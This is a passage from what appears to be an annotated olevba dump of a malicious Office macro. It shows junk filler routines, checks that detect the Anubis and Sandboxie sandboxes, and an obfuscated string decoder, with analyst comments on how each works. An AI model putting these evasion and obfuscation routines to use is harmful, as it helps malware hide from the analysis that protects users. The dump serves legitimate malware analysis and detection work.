  1560. kicNIdkpHH:
  1561.  
  1562. If "HsyGwFYANh" = "GDMkWHTWUA" Then End
  1563.  
  1564. GoTo UuZEbqYhrB
  1565. UuZEbqYhrB:
  1566.  
  1567. Dim TJnnNpIeIX As Long
  1568. TJnnNpIeIX = "5651":
  1569.  
  1570. End Function
  1571.  
  1572. Private Function qyaCxKrOGXYiwZGLvcWPDOnbSBtvJWCyIgrcP()
        ' Filler: four dead End branches, four no-op GoTo jumps and one DoEvents
        ' counting loop (2 to 14).
  1573.  
  1574. GoTo gbRvWVxJmQ
  1575. gbRvWVxJmQ:
  1576.  
  1577. If "MltvwsFmJB" = "STdrUBZqxK" Then End
  1578.  
  1579. Dim SzdEJuSghY As Integer
  1580. SzdEJuSghY = 2:
  1581. Do While SzdEJuSghY < 14
  1582.    DoEvents: SzdEJuSghY = SzdEJuSghY + 1
  1583. Loop
  1584.  
  1585. GoTo jzXXwZrVyg
  1586. jzXXwZrVyg:
  1587.  
  1588. GoTo GKqeoEQZFZ
  1589. GKqeoEQZFZ:
  1590.  
  1591. If "uEcOfLOMSa" = "BlmRDtIQGj" Then End
  1592.  
  1593. GoTo rhFfeHLncV
  1594. rhFfeHLncV:
  1595.  
  1596. If "FgCoDskicN" = "IdkpHHatHs" Then End
  1597.  
  1598. If "GwFYANhGDM" = "kWHTWUAbJU" Then End
  1599.  
  1600. End Function
  1601.  
  1602. Public Function ImrPEluFolgWBBaDVrVkRqyaCxKrOGXYiwZGL()
        ' Filler, declared Public: two DoEvents counting loops, three dead End
        ' branches, two no-op GoTo jumps and two unused constants.
  1603.  
  1604. Dim CpaAOFngiv As Integer
  1605. CpaAOFngiv = 3:
  1606. Do While CpaAOFngiv < 24
  1607.    DoEvents: CpaAOFngiv = CpaAOFngiv + 1
  1608. Loop
  1609.  
  1610. GoTo amKyzpAcgb
  1611. amKyzpAcgb:
  1612.  
  1613. If "vWVxJmQfMl" = "tvwsFmJBST" Then End
  1614.  
  1615. GoTo rUBZqxKKxC
  1616. rUBZqxKKxC:
  1617.  
  1618. Dim wGvhqdRwtc As Long
  1619. wGvhqdRwtc = "9280":
  1620.  
  1621. Dim uSghYBkPjz As Integer
  1622. uSghYBkPjz = 6:
  1623. Do While uSghYBkPjz < 21
  1624.    DoEvents: uSghYBkPjz = uSghYBkPjz + 1
  1625. Loop
  1626.  
  1627. If "ZrVygUtbwY" = "UgVKJAueAv" Then End
  1628.  
  1629. Dim hZySsGKqeo As Long
  1630. hZySsGKqeo = "7148":
  1631.  
  1632. If "ZFZxuEcOfL" = "OMSaBlmRDt" Then End
  1633.  
  1634. End Function
  1635.  
  1636. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1637. ANALYSIS:
  1638. No suspicious keyword or IOC found.
  1639. -------------------------------------------------------------------------------
  1640. VBA MACRO Module9.bas
  1641. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module9'
  1642. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1643. Private Function GjyfFNoQMYGculmwLnUsKqddRVCpzPbKXkQNW()
        ' Filler routine, like every routine in Module9: locals, DoEvents counting
        ' loops, comparisons of two different string literals guarding End, no-op
        ' GoTo jumps and unused constants. No API, object or other routine is
        ' called. Here the only loop (1 < 1) is never entered.
  1644.  
  1645. If "xayeNuYZdp" = "NbcTWfjeUS" Then End
  1646.  
  1647. Dim RtMpTbPowr As Integer
  1648. RtMpTbPowr = 1:
  1649. Do While RtMpTbPowr < 1
  1650.    DoEvents: RtMpTbPowr = RtMpTbPowr + 1
  1651. Loop
  1652.  
  1653. If "pFEVpkQXCt" = "tNNaFlzJZL" Then End
  1654.  
  1655. If "UspyXiaGJH" = "mVvgHMxODk" Then End
  1656.  
  1657. If "OSmcAazCuR" = "ujXQYeXjYn" Then End
  1658.  
  1659. End Function
  1660.  
  1661. Public Sub ECWgbwEJaatNBMSZQyrtgBZWfEpampntVcNOs()
        ' Filler, declared Public; no caller is visible in this part of the
        ' listing. Two no-op GoTo jumps, one DoEvents counting loop (8 to 23)
        ' and two unused constants.
  1662.  
  1663. GoTo cmWTOdIihK
  1664. cmWTOdIihK:
  1665.  
  1666. GoTo ZDSyYGIjFr
  1667. ZDSyYGIjFr:
  1668.  
  1669. Dim vnefQEgnsD As Integer
  1670. vnefQEgnsD = 8:
  1671. Do While vnefQEgnsD < 23
  1672.    DoEvents: vnefQEgnsD = vnefQEgnsD + 1
  1673. Loop
  1674.  
  1675. Dim kvVJbbdqdJ As Long
  1676. kvVJbbdqdJ = "7718":
  1677.  
  1678. Dim nZKwsqWeMX As Long
  1679. nZKwsqWeMX = "3470":
  1680.  
  1681. End Sub
  1682.  
  1683. Private Sub UGdSsJTvAukPpoRDGjyfFNoQMYGculmwLnUsK()
        ' Filler: one unused constant, three DoEvents counting loops and one dead
        ' End branch.
  1684.  
  1685. Dim sXDRBqclyl As Long
  1686. sXDRBqclyl = "7338":
  1687.  
  1688. Dim PaSxayeNuY As Integer
  1689. PaSxayeNuY = 0:
  1690. Do While PaSxayeNuY < 13
  1691.    DoEvents: PaSxayeNuY = PaSxayeNuY + 1
  1692. Loop
  1693.  
  1694. Dim bcTWfjeUSS As Integer
  1695. bcTWfjeUSS = 8:
  1696. Do While bcTWfjeUSS < 22
  1697.    DoEvents: bcTWfjeUSS = bcTWfjeUSS + 1
  1698. Loop
  1699.  
  1700. If "pTbPowrToB" = "pFEVpkQXCt" Then End
  1701.  
  1702. Dim NNaFlzJZLU As Integer
  1703. NNaFlzJZLU = 7:
  1704. Do While NNaFlzJZLU < 21
  1705.    DoEvents: NNaFlzJZLU = NNaFlzJZLU + 1
  1706. Loop
  1707.  
  1708. End Sub
  1709.  
  1710. Private Sub ROXvhZehfltUFGkWmbjzDmqLByyYBTpTivowY()
        ' Filler: two dead End branches, one unused constant and two no-op GoTo
        ' jumps; no loop at all.
  1711.  
  1712. If "YnfDxIDyfk" = "CbvoCNtarA" Then End
  1713.  
  1714. Dim ICBYHfRbOR As Long
  1715. ICBYHfRbOR = "95":
  1716.  
  1717. GoTo wEopUZwLTc
  1718. wEopUZwLTc:
  1719.  
  1720. GoTo TOdIihKcZD
  1721. TOdIihKcZD:
  1722.  
  1723. If "yYGIjFrZvn" = "efQEgnsDKd" Then End
  1724.  
  1725. End Sub
  1726.  
  1727. Private Sub VJUthYHACPChenmxiuRPudkVPUGdSsJTvAukP()
        ' Filler: the loop starting at 7 with the bound 4 is never entered; the
        ' rest is two unused constants and two dead End branches.
  1728.  
  1729. Dim EhLAggoQrn As Integer
  1730. EhLAggoQrn = 7:
  1731. Do While EhLAggoQrn < 4
  1732.    DoEvents: EhLAggoQrn = EhLAggoQrn + 1
  1733. Loop
  1734.  
  1735. Dim WNOYmPvUlS As Long
  1736. WNOYmPvUlS = "4971":
  1737.  
  1738. If "sXDRBqclyl" = "rOxPaSxaye" Then End
  1739.  
  1740. If "ZdpNbcTWfj" = "eUSSRtMpTb" Then End
  1741.  
  1742. Dim owrToBpFEV As Long
  1743. owrToBpFEV = "3340":
  1744.  
  1745. End Sub
  1746.  
  1747. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1748. ANALYSIS:
  1749. No suspicious keyword or IOC found.
  1750. -------------------------------------------------------------------------------
  1751. VBA MACRO sdfdsf.bas
  1752. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/sdfdsf'
  1753. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1754. Private Declare Function GetVolumeInformation Lib "kernel32.dll" Alias "GetVolumeInformationA" (ByVal lpRootPathName As String, ByVal lpVolumeNameBuffer As String, ByVal nVolumeNameSize As Integer, lpVolumeSerialNumber As Long, lpMaximumComponentLength As Long, lpFileSystemFlags As Long, ByVal lpFileSystemNameBuffer As String, ByVal nFileSystemNameSize As Long) As Long
        ' Win32 import used by GetSerialNumber below to read a volume serial number.
  1755.  
  1756. Function IsAnubisPresent(ByVal OptionToCheck As Integer) As Boolean
        ' Environment check: returns True when the host matches one fixed
        ' fingerprint, selected by OptionToCheck (1-4). The function name suggests
        ' the values are meant to identify the Anubis analysis sandbox; nothing in
        ' this listing shows which option the macro passes or what it does with
        ' the result.
        ' For analysts: the literals compared below (volume serial, ProductId,
        ' "SAMPLE", "USER") are usable as static detection strings, and an
        ' analysis VM that exposes any of them can be recognised by this check.
        ' Any other OptionToCheck value leaves the result at its default, False.
  1757.    On Error Resume Next
        ' Run-time errors are suppressed for the whole function. In VBA, when the
        ' condition of a block If raises an error under Resume Next, execution
        ' continues on the next line, i.e. inside the Then branch.
  1758.    Set WShell = CreateObject("WScript.Shell")
  1759.  
  1760.    Select Case OptionToCheck
  1761.        Case 1
        ' Serial number of the system drive's volume against a fixed value.
  1762.            If GetSerialNumber(Environ("SystemDrive") & "\") = "1824245000" Then
  1763.                IsAnubisPresent = True
  1764.            Else
  1765.                IsAnubisPresent = False
  1766.            End If
  1767.        Case 2
        ' Windows ProductId against a fixed value. NOTE(review): WScript.Shell
        ' exposes RegRead, not RedRead, so this call presumably fails; with the
        ' error suppressed the Then branch would run and the case would report
        ' True on every host - confirm in a debugger.
  1768.            If WShell.RedRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductId") = "76487-337-8429955-22614" Then
  1769.                IsAnubisPresent = True
  1770.            Else
  1771.                IsAnubisPresent = False
  1772.            End If
  1773.        Case 3
        ' Executable name against "SAMPLE". NOTE(review): App is the VB6
        ' application object and is not defined in the visible modules; inside an
        ' Office host this line probably errors like Case 2 - confirm.
  1774.            If UCase(App.EXEName) = "SAMPLE" Then
  1775.                IsAnubisPresent = True
  1776.            Else
  1777.                IsAnubisPresent = False
  1778.            End If
  1779.        Case 4
        ' Logged-on user name (USERNAME environment variable) against "USER".
  1780.            If UCase(Environ("USERNAME")) = "USER" Then
  1781.                IsAnubisPresent = True
  1782.            Else
  1783.                IsAnubisPresent = False
  1784.            End If
  1785.    End Select
  1786. End Function
  1787.  
  1788. Public Function GetSerialNumber(DriveLetter As String) As Long
        ' Returns the value GetVolumeInformation writes into SerialNum for the
        ' root path in DriveLetter (the caller above passes SystemDrive & "\").
        ' Buffer1 and Buffer2 are 255-character NUL-filled strings handed to the
        ' API as the volume-name and file-system-name buffers; their contents and
        ' the API's return value (Res) are not used afterwards.
        ' Buffer1, Buffer2, Res and SerialNum are not declared anywhere in the
        ' visible module.
  1789.    Buffer1 = String$(255, Chr$(0))
  1790.    Buffer2 = String$(255, Chr$(0))
  1791.    Res = GetVolumeInformation(DriveLetter, Buffer1, Len(Buffer1), SerialNum, 0, 0, Buffer2, Len(Buffer2))
  1792.    GetSerialNumber = SerialNum
  1793. End Function
  1794. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1795. ANALYSIS:
  1796. +------------+----------------+-----------------------------------------+
  1797. | Type       | Keyword        | Description                             |
  1798. +------------+----------------+-----------------------------------------+
  1799. | Suspicious | CreateObject   | May create an OLE object                |
  1800. | Suspicious | Lib            | May run code from a DLL                 |
  1801. | Suspicious | Shell          | May run an executable file or a system  |
  1802. |            |                | command                                 |
  1803. | Suspicious | WScript.Shell  | May run an executable file or a system  |
  1804. |            |                | command                                 |
  1805. | Suspicious | Environ        | May read system environment variables   |
  1806. | Suspicious | Windows        | May enumerate application windows (if   |
  1807. |            |                | combined with Shell.Application object) |
  1808. | Suspicious | Chr            | May attempt to obfuscate specific       |
  1809. |            |                | strings                                 |
  1810. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  1811. |            |                | be used to obfuscate strings (option    |
  1812. |            |                | --decode to see all)                    |
  1813. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  1814. |            |                | may be used to obfuscate strings        |
  1815. |            |                | (option --decode to see all)            |
  1816. | IOC        | kernel32.dll   | Executable file name                    |
  1817. +------------+----------------+-----------------------------------------+
  1818. -------------------------------------------------------------------------------
  1819. VBA MACRO sdfsdfsdf.bas
  1820. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/sdfsdfsdf'
  1821. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1822. Public Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long
        ' Win32 import; declared Public, so it is callable from every module.
  1823.  
  1824. Function IsSandBoxiePresent(ByVal OptionToCheck As Integer) As Boolean
        ' Environment check: returns True when the selected test (OptionToCheck 1
        ' or 2) indicates the process runs under Sandboxie. Any other value leaves
        ' the result at its default, False. Callers are not visible in this
        ' listing.
        ' For analysts: "SbieDll.dll" together with a GetModuleHandle import is a
        ' usable static indicator of this check.
  1825.    Select Case OptionToCheck
  1826.        Case 1  'Recommended
        ' A non-zero handle means a module named SbieDll.dll is already loaded in
        ' the current process.
  1827.           Dim hSbie As Long
  1828.  
  1829.            hSbie = GetModuleHandle("SbieDll.dll")
  1830.            If hSbie <> 0 Then
  1831.                IsSandBoxiePresent = True
  1832.            Else
  1833.                IsSandBoxiePresent = False
  1834.            End If
  1835.        Case 2  'Not recommended
        ' Looks for the "[#]" marker in a form caption. NOTE(review): MainFrm is
        ' not defined in the visible modules and no error handler is set in this
        ' function, so this branch presumably cannot run as-is in this document -
        ' confirm.
  1836.           If InStr(MainFrm.Caption, "[#]") <> 0 Then
  1837.                IsSandBoxiePresent = True
  1838.            Else
  1839.                IsSandBoxiePresent = False
  1840.            End If
  1841.    End Select
  1842. End Function
  1843. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1844. ANALYSIS:
  1845. +------------+----------------+-----------------------------------------+
  1846. | Type       | Keyword        | Description                             |
  1847. +------------+----------------+-----------------------------------------+
  1848. | Suspicious | Lib            | May run code from a DLL                 |
  1849. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  1850. |            |                | may be used to obfuscate strings        |
  1851. |            |                | (option --decode to see all)            |
  1852. | IOC        | SbieDll.dll    | Executable file name                    |
  1853. +------------+----------------+-----------------------------------------+
  1854. -------------------------------------------------------------------------------
  1855. VBA MACRO sdfsdfsdffff.bas
  1856. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/sdfsdfsdffff'
  1857. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1858. Public Function MkSrpQP(ByVal strData As String, ByVal strKey As String)
        ' String decoder: strData and strKey are converted to byte arrays
        ' (StrConv ... vbFromUnicode), a key byte is subtracted from every data
        ' byte, and the bytes are converted back to a string as the return value.
        ' The encoded strings and the key are passed in by callers that are not
        ' in this part of the listing.
        ' Every "Dim x / For x = 0 To 0 / If x = 5 Then End / Next x" group below
        ' is filler: x only ever holds 0, so End is never reached.
        ' Notes for decoding the strings offline rather than running the macro:
        '  - past the end of the key the index is i Mod UBound(bKey), i.e. modulo
        '    (key length - 1), so the last key byte is applied only at
        '    i = UBound(bKey); a decoder using "i Mod key length" gives wrong output.
        '  - bData holds Byte values, so a data byte smaller than its key byte
        '    makes the subtraction raise an overflow error; no error handler is
        '    set in this function.
        '  - a one-character key makes UBound(bKey) zero, so the Mod would divide
        '    by zero for any data longer than one byte.
        '  - the loop variable i is not declared in this function.
  1859. Dim bData() As Byte
  1860. Dim cSIQhPPCpQ As Integer
  1861. For cSIQhPPCpQ = 0 To 0
  1862. If cSIQhPPCpQ = 5 Then End
  1863. Next cSIQhPPCpQ
  1864. Dim BGOEkt As Integer
  1865. For BGOEkt = 0 To 0
  1866. If BGOEkt = 5 Then End
  1867. Next BGOEkt
  1868. Dim bKey() As Byte
  1869. Dim mCDZb As Integer
  1870. For mCDZb = 0 To 0
  1871. If mCDZb = 5 Then End
  1872. Next mCDZb
  1873. Dim hDCeLdOSt As Integer
  1874. For hDCeLdOSt = 0 To 0
  1875. If hDCeLdOSt = 5 Then End
  1876. Next hDCeLdOSt
  1877. bData = StrConv(strData, vbFromUnicode)
  1878. Dim iALAxrJGeN As Integer
  1879. For iALAxrJGeN = 0 To 0
  1880. If iALAxrJGeN = 5 Then End
  1881. Next iALAxrJGeN
  1882. Dim DCeLdO As Integer
  1883. For DCeLdO = 0 To 0
  1884. If DCeLdO = 5 Then End
  1885. Next DCeLdO
  1886. bKey = StrConv(strKey, vbFromUnicode)
  1887. Dim sGQzzmmNQKfJiAL As Integer
  1888. For sGQzzmmNQKfJiAL = 0 To 0
  1889. If sGQzzmmNQKfJiAL = 5 Then End
  1890. Next sGQzzmmNQKfJiAL
  1891. Dim tSeZqoKgExtE As Integer
  1892. For tSeZqoKgExtE = 0 To 0
  1893. If tSeZqoKgExtE = 5 Then End
  1894. Next tSeZqoKgExtE
  1895. For i = 0 To UBound(bData)
  1896. Dim MLQBuBgGsI As Integer
  1897. For MLQBuBgGsI = 0 To 0
  1898. If MLQBuBgGsI = 5 Then End
  1899. Next MLQBuBgGsI
  1900. Dim PRyEYg As Integer
  1901. For PRyEYg = 0 To 0
  1902. If PRyEYg = 5 Then End
  1903. Next PRyEYg
  1904. If i <= UBound(bKey) Then
  1905. Dim zAhBGOEktusx As Integer
  1906. For zAhBGOEktusx = 0 To 0
  1907. If zAhBGOEktusx = 5 Then End
  1908. Next zAhBGOEktusx
  1909. Dim QSHcSIQ As Integer
  1910. For QSHcSIQ = 0 To 0
  1911. If QSHcSIQ = 5 Then End
  1912. Next QSHcSIQ
        ' First pass over the key: data byte minus the key byte at the same index.
  1913. bData(i) = bData(i) - bKey(i)
  1914. Dim ALAxrJ As Integer
  1915. For ALAxrJ = 0 To 0
  1916. If ALAxrJ = 5 Then End
  1917. Next ALAxrJ
  1918. Dim DbVzAhBG As Integer
  1919. For DbVzAhBG = 0 To 0
  1920. If DbVzAhBG = 5 Then End
  1921. Next DbVzAhBG
  1922. Else
  1923. Dim ddchRKRwJIZc As Integer
  1924. For ddchRKRwJIZc = 0 To 0
  1925. If ddchRKRwJIZc = 5 Then End
  1926. Next ddchRKRwJIZc
  1927. Dim vSNrta As Integer
  1928. For vSNrta = 0 To 0
  1929. If vSNrta = 5 Then End
  1930. Next vSNrta
        ' Key reuse: the index wraps at UBound(bKey), not at the key length.
  1931. bData(i) = bData(i) - bKey(i Mod UBound(bKey))
  1932. Dim aeEspjB As Integer
  1933. For aeEspjB = 0 To 0
  1934. If aeEspjB = 5 Then End
  1935. Next aeEspjB
  1936. Dim ZhuVqUtK As Integer
  1937. For ZhuVqUtK = 0 To 0
  1938. If ZhuVqUtK = 5 Then End
  1939. Next ZhuVqUtK
  1940. End If
  1941. Dim pQoae As Integer
  1942. For pQoae = 0 To 0
  1943. If pQoae = 5 Then End
  1944. Next pQoae
  1945. Dim xxZhuVqUtKlL As Integer
  1946. For xxZhuVqUtKlL = 0 To 0
  1947. If xxZhuVqUtKlL = 5 Then End
  1948. Next xxZhuVqUtKlL
  1949. Next i
  1950. Dim spjBzVrPV As Integer
  1951. For spjBzVrPV = 0 To 0
  1952. If spjBzVrPV = 5 Then End
  1953. Next spjBzVrPV
  1954. Dim PkMRfcKYxxZ As Integer
  1955. For PkMRfcKYxxZ = 0 To 0
  1956. If PkMRfcKYxxZ = 5 Then End
  1957. Next PkMRfcKYxxZ
  1958.  MkSrpQP = StrConv(bData, vbUnicode)
  1959. Dim QScmhKas As Integer
  1960. For QScmhKas = 0 To 0
  1961. If QScmhKas = 5 Then End
  1962. Next QScmhKas
  1963. Dim xNdkmv As Integer
  1964. For xNdkmv = 0 To 0
  1965. If xNdkmv = 5 Then End
  1966. Next xNdkmv
  1967. End Function
  1968.  
  1969. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1970. ANALYSIS:
  1971. No suspicious keyword or IOC found.